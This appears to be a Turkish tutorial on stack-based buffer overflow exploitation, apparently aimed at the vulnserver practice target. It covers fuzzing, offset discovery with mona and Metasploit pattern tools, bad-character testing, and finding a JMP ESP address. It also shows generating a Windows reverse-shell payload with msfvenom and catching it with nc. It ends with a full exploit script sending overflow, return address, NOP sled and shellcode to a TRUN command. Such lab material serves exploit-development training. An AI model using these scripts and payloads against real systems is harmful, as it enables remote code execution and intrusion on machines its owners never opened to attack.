BOF - Stack Based
Stack Based Buffet Overflow
FuzzingUygulamada bulunan girdi noktalarına fuzzing uygulanır. Bu işlem için aşağıdaki python kodu ile bir soket başlatılıp TCP üzerinden data gönderilebilir.
#/usr/bin/python2
import sys, socket
from time import sleep
buffer = "A" * 100
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('IP', PORT))
s.send(("PRE-COMMAND" + buffer))
s.close()
sleep(1)
buffer = buffer + "A" * 100
print "Send %s" % str(len(buffer))
Fuzzing işlemi sırasında program crashlenir ise "access violation" hatası alınırsa büyük ihtimal ile bof zafiyeti vardır. Immunity Debugger'dan
EIP, EAX gibi registerların değerine bakılabilir.Crash kaç byte gönderildikten sonra alınmış ise o boyutta pattern oluşturulup gönderilir. Bunu yapmaktaki amaç kaç byte'dan sonra
EIP ve ESP registerlarına yazıyor bilgisine ulaşmak.Bu işlem için pattern üretilmelidir. Bunu birçok farklı şekilde yapmak mümkündür. Immunity Debugger'da kullanılan
mona veya kalide bulunan pattern_create veya pattern_offset gibi araçlar kullanılabilir.Mona modülünü kullanırken logların kaydedileceği dizini ayarlamak için aşağıda yer alan komut kullanılabilir.
!mona config -set workingfolder c:\logs\%p
- 1.mona ile;
!mona pc <pattern_size> - 2.msf'de bulunan ruby aracı ile;
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <pattern_size> - 3./bin/msf-* araçları ile;
msf-pattern_create -l <pattern_size> - 4.Benzer amaçla yazılmış bir çok tool bulmak mümkündür. (Kali de /bin/msf-* araçları da ayrıca vardır.)
EIP registarına yazılan değerin offset değerini bulmak için; 1. mona ile;
!mona po <pattern_value>- 1.msf'de bulunan ruby aracı ile;
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <pattern_size> -q <pattern_value> - 2./bin/msf-* araçları ile;
msf-patter_offset -q <pattern_value>
EIP registerına ait offset değeri bulunduktan sonra badcharların bulunması gerekli. Badcharlar registerlarda bulunan veriler işlenirken özel olarak yorumlanan karakterlerdir. Bu durum bizim kullanacağımız zararlı shellcode'u etkileyeceği için bu tür karakterleri içermeyecek şekilde shellkodumuzu üretmeliyiz.
badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
Bu aşamada gönderilecek verimiz"A" * <offset_value> + "B" * 4 + badcharsşeklinde olacaktır. badchar değişkeninin tuple olması önemlidir!
Stack alanını doldurduğumuzda yani
EAX, EBX, EIP registarlarına yazdıktan sonra badcharların yazılacağı register ESP registerı olacaktır.Not ; ESP Shellkodumuzu bu registara yazacağız. O yüzden bu registara yazılacak shellcodun içinde badchar olması durumunda shellcodumuz çalışmayacaktır. Bu sebepten badchar tespiti önemlidir.
Shellcodumuz stack de bulunan
ESP belirtiği alana yazılır. Bu sebeple bizim bu registara atlayan (JMP) komutun bellek adresine ihtiyacımız olacak. Yukarıda belirtildiği üzere EIP registerına yazabilmekteyiz. Biz de EIP registarına, ESP registarına zıplayan kodun bellek adresini yazacağız. Böylece kod ÈIP registarına geldiğinde burda ESP giden bellek adresini görecektir. ESP ye shellcodumuzu yazarak programın akışını değiştirip istediğimiz kodu çalıştırmış olacağız. Bu sebeple ESP registarına giden bir komutun bellek adresine ihtiyaç duymaktayız. Bunu bulmanın birçok farklı yolları vardır.Öncellikler
!mona modules diyerek uygulamamızın kullandığı modüllere bakacağız. Bu modüllerde herhangi bir memory proctection var mı? varsa hangileri gibi bilgiler bizim için önemli. Çıkan menüde memory protection olmayan modüller birincil odak noktamız olmalı.Daha memory procteion olmayan modüllerin herhangi birinde
JMP ESP kodunu arayacağız. Bunu yapmaktaki amacımız; bu komutun olduğu bellek adresini bulup EIP registerına yazmak. EIP bu bellek adresindeki komutu gösterdiğinde burdaki komut ile ESP sıçrayacaktır ve ordan da shellcodumuz çalışmış olacak.JMP ESPkomutunun opcoduFFE4dür.
- 1.mona ile;
!mona find -s “\xff\xe4” -m <module_name> - 2.ımmunity debugger ile;
View > Executables modules > "module_name" X2 click > CTRL + F > search "JMP ESP" > note memmory adres!
Bulunan değer
EIP registarına yazılacak şekilde koda eklenmelidir. Kodun bu aşamadki hali;
"A" * <byte_size> + "<adress of JMP ESP>" + "\x90" * 8 olmalıdır.Not :
JMP ESP nin bellek adresi yazılırken little endian olduğu için tersten yazılmalıdır. Yani "A5F256CC" adresi "CC56F2A5" şeklinde yazılmalıdır.Bu aşamada shellcodu üretip göndereceğimiz payloada ekleyeceğiz. Bunun için
msfvenom aracını kullanacağız.# msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -b "\x00" -f python -v shellcode
bu komutun sonucunda çıkan çıktıyı kodumuza aşağıdaki şekilde ekleyeceğiz.
buffer = "A" * <byte_size> + "<address of JMP ESP>" + "\x90" * 8 + shellcodePayloadın nihai şekli yukarıdaki şekildedir.
Artık tüm işlemler tamam olduğuna göre
nc ile ilgili portu dinlemeye alıp exploit kodumuzu çalıştırmamız gerekecek.nc -vlp <port_number>Dipnotlar;
- badchars değişkeni tuple olmalıdır!
- "\x90" no operation komutudur. Kullanacağımız payloadın patlamaması için kesinlikle eklenmesi tavsiye edilir.
- shellcode üretilirken özellikle windows tarafından engellenmeyecek portlar kullanılması tavsiye edilir. 53, 80, 443 gibi sık kullanılan portlar kullanılmalıdır.
Bonus - Sample;
#/usr/bin/python2
import sys, socket
from time import sleep
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
shellcode = ""
shellcode += "\xdb\xc2\xbe\x8a\x7f\xb7\x29\xd9\x74\x24\xf4\x5f"
shellcode += "\x2b\xc9\xb1\x52\x31\x77\x17\x03\x77\x17\x83\x4d"
....
shellcode += "\x47\x3e\x84\xc2\x42\x7a\x02\x3f\x3f\x13\xe7\x3f"
shellcode += "\xec\x14\x22"
buffer = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 8 + shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.23', 9999))
s.send(("TRUN /.:/" + buffer))
s.close()
sleep(1)
#buffer = buffer + "A" * 100
print "Send %s" % str(len(buffer))
Last modified 1yr ago